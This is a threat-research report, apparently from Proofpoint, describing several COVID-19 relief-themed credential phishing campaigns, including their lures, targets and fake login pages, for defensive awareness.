Proofpoint researchers have observed an emerging trend of credential phishing and social engineering lures around COVID-19 financial relief. These campaigns use the promise of payments by global governments and businesses (specifically financial institutions) aimed at easing the economic impact of the ongoing pandemic to urge users to click links or download files.
In this credential phishing update surrounding payment fraud news, we highlight a few of these campaign examples that are targeting those in the U.S., UK, Australia.
Credential Phish: Trump Administration Covid-19 Check for Most Americans
Key Points: This medium-sized credential phish campaign primarily targeted U.S. healthcare and higher education organizations with a message claiming that the Trump administration is considering sending most American adults a check to help stimulate the economy. The email asks recipients to verify their email account through a malicious link that directs them to a phishing page.
Figure 1 US Payroll COVID-19 Relief Lure
Government-Themed Attacks Summary:
This medium-sized credential phishing campaign primarily targeted the United States and was largely sent to healthcare and higher education organizations. Secondary targeting for this campaign includes the technology industry, including information security companies. The messages are notable for its crude design, as the message has clear grammar and usage errors and uses a basic webpage clearly branded by a free website maker for its credential phishing.
The email notes that “the Trump administration is considering sending most American adults a check for $1,000 as part of the efforts to stimulate the economy and help workers whose jobs have been disrupted by business closures because of the pandemic”.
Recipients are directed to verify their information for the “new payroll directory” by clicking the malicious link in the email.
If the recipient clicks the link, they are taken to the phishing page which asks for their domain\username, email address and password as shown in Figure 2.
Figure 2 US Payroll COVID-19 Relief Credential Phishing Page
Credential Phish: Australian Government Coronavirus/COVID-19 Tax Relief
Key Points: This campaign claims to be sent by a major Australian newspaper and uses subject lines such as "Government announces increased tax benefits in response to the Coronavirus." The messages contain a .PDF attachment with an embedded URL that leads to a OneDrive credential phishing page.
Figure 3 Australian COVID-19 Tax Benefit Lure
Credential Phish: Australian Government Summary:
The emails within this campaign claim to be delivered by a major newspaper in Australia. Figure 3 shows that it is actually delivered by a Romanian top-level domain address of “.ro.” To appear authentic, the message includes supposed contact information for the paper and notes that they are “…happy to advise that we have now moved back to” the address provided. It’s notable that the address in the email does not match the newspaper being spoofed.
The email claims that the “Government has released its stimulus package in response to the Coronavirus outbreak” and encourages the recipient to open the malicious attachment for more details.
The attachment is an Adobe .PDF document with spoofed Microsoft OneDrive branding that informs users that “Your document is waiting for you” and encourages them to click the embedded link as shown in Figure 4.
Figure 4 Australian COVID-19 Tax Benefit Malicious Attachment
After clicking the link, the recipient is taken to a page that asks for their Microsoft OneDrive credentials.
Credential Phish: WHO-IMF “Relief Compensation” Steals Emails and Passwords
Key Points: This small email campaign targets technology and IT organizations with a subject line of "COVID 19 : Relief Compensation." It claims to come from the World Health Organization (WHO) and the International Monetary Fund (IMF) and says the recipient has “been randomly selected to be compensated financially due to the outbreak of the COVID-19 Epidemic outbreak” with a malicious Microsoft Excel branded attachment that gathers emails and passwords.
Figure 5 Fake WHO and IMF Compensation Lure
WHO Credential Phish Summary:
This small email campaign targets technology and IT companies and arrives with a subject line of "COVID 19 : Relief Compensation." It claims to come from the World Health Organization (WHO) working with the International Monetary Fund (IMF). It tells the recipient that they have “been randomly selected to be compensated financially due to the outbreak of the COVID-19 Epidemic outbreak”. It goes on to say that the recipient will be “paid through our paying center in london [SIC] for your compensation payment from the International Monetary Fund Office treasury account.” To obtain these funds, the recipient is instructed “view the attached file to print your winning confirmation.”
The attachment is a malicious HTML attachment titled "COVID18-COMPENSATION.html" (note the error of “COVID18 rather than COVID19”). When the attachment is opened it displays a fake Microsoft Excel branded page that asks for the recipient’s email and password as shown in Figure 6.